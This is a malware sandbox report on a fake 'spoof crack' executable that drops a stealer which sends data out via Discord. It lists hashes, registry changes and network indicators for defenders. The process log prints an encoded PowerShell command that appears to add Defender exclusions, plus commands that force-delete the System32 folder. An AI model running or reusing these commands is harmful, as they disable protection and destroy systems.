File name:

lcb_spoof_crack.exe

Full analysis: https://app.any.run/tasks/91cf3a5a-b14d-45be-a0fd-6e06970d5082
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: March 24, 2025, 19:01:51
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
discord
exfiltration
stealer
evasion
github
susp-powershell
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, 4 sections
MD5:

EE5136686EE07730BC08F8143FBE048C

SHA1:

82B5109F402DF793B4CC1712A1709330EAA72208

SHA256:

355F58C2B357F9718038DEAE8E6F2A1E7C35C0D60153A169A7D736EC4F6E5CCA

SSDEEP:

98304:nNIxUKJFgx4Fdmfl2oSKE5ry9KNMoeyhBFY7eRP/u4aEik9w6Vm88nD6rzVOhXkD:cK991UxLWvoIujryzA0sj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Actions looks like stealing of personal data

      • X Worm Nuker.exe (PID: 7248)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • lcb_spoof_crack.exe (PID: 4300)

    • BASE64 encoded PowerShell command has been detected

      • lcb_spoof_crack.exe (PID: 4300)

    • Checks for external IP

      • X Worm Nuker.exe (PID: 7248)

    • The process connected to a server suspected of theft

      • X Worm Nuker.exe (PID: 7248)

    • Starts POWERSHELL.EXE for commands execution

      • lcb_spoof_crack.exe (PID: 4300)

    • Starts CMD.EXE for commands execution

      • X Worm Nuker.exe (PID: 7248)

    • Base64-obfuscated command line is found

      • lcb_spoof_crack.exe (PID: 4300)

    • Executable content was dropped or overwritten

      • lcb_spoof_crack.exe (PID: 4300)

  • INFO

    • Reads the computer name

      • lcb_spoof_crack.exe (PID: 4300)
      • X Worm Nuker.exe (PID: 7248)

    • Checks supported languages

      • X Worm Nuker.exe (PID: 7248)
      • lcb_spoof_crack.exe (PID: 4300)

    • Disables trace logs

      • X Worm Nuker.exe (PID: 7248)

    • Reads the software policy settings

      • X Worm Nuker.exe (PID: 7248)

    • Create files in a temporary directory

      • lcb_spoof_crack.exe (PID: 4300)

    • Checks proxy server information

      • X Worm Nuker.exe (PID: 7248)
      • BackgroundTransferHost.exe (PID: 516)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4812)

    • Reads Environment values

      • X Worm Nuker.exe (PID: 7248)

    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • powershell.exe (PID: 4812)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4812)

    • Process checks computer location settings

      • lcb_spoof_crack.exe (PID: 4300)

    • Attempting to use instant messaging service

      • X Worm Nuker.exe (PID: 7248)

    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 516)
      • BackgroundTransferHost.exe (PID: 208)

    • Reads the machine GUID from the registry

      • X Worm Nuker.exe (PID: 7248)

    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 516)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (61.6)
.dll | Win32 Dynamic Link Library (generic) (14.6)
.exe | Win32 Executable (generic) (10)
.exe | Win16/32 Executable Delphi generic (4.6)
.exe | Generic Win/DOS Executable (4.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType: PE32
LinkerVersion: 6
CodeSize: 2048
InitializedDataSize: 8039936
UninitializedDataSize: -
EntryPoint: 0x14d1
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
153
Monitored processes
17
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start lcb_spoof_crack.exe powershell.exe no specs conhost.exe no specs lcb_spoof_crack.exe no specs x worm nuker.exe sppextcomobj.exe no specs slui.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs lcb_spoof_crack.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
208"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
516"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
960"cmd.exe" /C rd /s /q C:\Windows\System32C:\Windows\System32\cmd.exeX Worm Nuker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
1180"cmd.exe" /C Remove-Item -Path C:\Windows\System32 -Recurse -ForceC:\Windows\System32\cmd.exeX Worm Nuker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2096\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4300"C:\Users\admin\Desktop\lcb_spoof_crack.exe" C:\Users\admin\Desktop\lcb_spoof_crack.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\lcb_spoof_crack.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
4812"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdgBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAegBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAagB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAbQB2ACMAPgA="C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exelcb_spoof_crack.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
5116"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
5376"C:\Users\admin\Desktop\lcb_spoof_crack.exe" C:\Users\admin\Desktop\lcb_spoof_crack.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\desktop\lcb_spoof_crack.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
6032\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
8 675
Read events
8 646
Write events
29
Delete events
0

Modification events

(PID) Process:(7248) X Worm Nuker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7248) X Worm Nuker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7248) X Worm Nuker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7248) X Worm Nuker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7248) X Worm Nuker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7248) X Worm Nuker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7248) X Worm Nuker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(7248) X Worm Nuker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7248) X Worm Nuker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7248) X Worm Nuker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
2
Suspicious files
6
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
516BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4a2fb966-37c5-4149-a6d1-8eea4b406c3f.down_data
MD5:
SHA256:
4812powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xqlwu3ox.2dx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4812powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1cvgp224.1ua.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4812powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kgz5s3ez.tb5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
516BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10Dbinary
MD5:FAA1D57DDED14C2A8C34B989979E74D9
SHA256:64FE2AB62FF8BA96791DA1E5E87A400E7504DC9945F28765A80DDC7BB827EA61
516BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10Dbinary
MD5:4872BABAF39AA62B8D32695EBB7E9173
SHA256:2EE85DF86EE29BBEB3DCA81AA29B6DE204F605A2769B84C728A329178A2D0999
516BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\3e4c4be9-f26a-4683-868d-be3bcb16a8ea.up_meta_securebinary
MD5:62D4A5ED1B61EC4885F7B11BFA1927EE
SHA256:37DF9A30222BC015ED47925E7DE767DCF9009ACCF5427DA14C7D4EE5B4E82682
4300lcb_spoof_crack.exeC:\Users\admin\AppData\Local\Temp\X Worm Nuker.exeexecutable
MD5:741BBF579E6686AB87F9674D1F4B264D
SHA256:B4B2027DFD94A35C2BCF371ABCA1F16E3C10100B719DF65EC0CBE4D534770881
516BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\3e4c4be9-f26a-4683-868d-be3bcb16a8ea.300c1d4a-261b-4e1a-b283-e71f7dd785ea.down_metabinary
MD5:149A84572D196DB653E09D4B46194767
SHA256:4C929DFCE10A3723077F871486C00031B081F568DD4D5EC128DB03143B568F7D
516BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4a2fb966-37c5-4149-a6d1-8eea4b406c3f.300c1d4a-261b-4e1a-b283-e71f7dd785ea.down_metabinary
MD5:149A84572D196DB653E09D4B46194767
SHA256:4C929DFCE10A3723077F871486C00031B081F568DD4D5EC128DB03143B568F7D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
53
DNS requests
17
Threats
16

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.141:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
23.54.109.203:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
516
BackgroundTransferHost.exe
GET
200
23.54.109.203:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
7212
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7212
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7388
backgroundTaskHost.exe
GET
200
23.54.109.203:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.141:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
6652
RUXIMICS.exe
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
7248
X Worm Nuker.exe
162.159.135.234:443
gateway.discord.gg
CLOUDFLARENET
whitelisted
3216
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
40.126.31.130:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
23.54.109.203:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
7248
X Worm Nuker.exe
162.159.137.232:443
discord.com
CLOUDFLARENET
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.142
whitelisted
crl.microsoft.com
  • 23.48.23.141
  • 23.48.23.158
  • 23.48.23.159
  • 23.48.23.143
  • 23.48.23.177
  • 23.48.23.164
  • 23.48.23.166
  • 23.48.23.180
  • 23.48.23.150
whitelisted
gateway.discord.gg
  • 162.159.135.234
  • 162.159.133.234
  • 162.159.136.234
  • 162.159.134.234
  • 162.159.130.234
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
login.live.com
  • 40.126.31.130
  • 40.126.31.128
  • 20.190.159.23
  • 40.126.31.131
  • 20.190.159.0
  • 40.126.31.2
  • 20.190.159.73
  • 20.190.159.131
whitelisted
ocsp.digicert.com
  • 23.54.109.203
whitelisted
discord.com
  • 162.159.137.232
  • 162.159.138.232
  • 162.159.136.232
  • 162.159.135.232
  • 162.159.128.233
whitelisted
geolocation-db.com
  • 159.89.102.253
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
www.bing.com
  • 2.19.96.66
  • 2.19.96.120
  • 2.19.96.8
  • 2.19.96.18
  • 2.19.96.80
  • 2.19.96.90
whitelisted

Threats

PID
Process
Class
Message
7248
X Worm Nuker.exe
Misc activity
ET INFO Observed Discord Service Domain (gateway .discord .gg) in TLS SNI
2196
svchost.exe
Misc activity
ET INFO Discord Chat Service Domain in DNS Lookup (gateway .discord .gg)
7248
X Worm Nuker.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
2196
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
2196
svchost.exe
Misc activity
ET INFO Discord Chat Service Domain in DNS Lookup (discord .com)
7248
X Worm Nuker.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] Attempt to exfiltrate via Discord
7248
X Worm Nuker.exe
Misc activity
ET INFO Observed Discord Service Domain (discord .com) in TLS SNI
7248
X Worm Nuker.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
2196
svchost.exe
Misc activity
ET INFO External IP Lookup Domain in DNS Lookup (geolocation-db .com)
7248
X Worm Nuker.exe
Misc activity
ET INFO External IP Lookup Domain (geolocation-db .com) in TLS SNI
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
lcb_spoof_crack.exe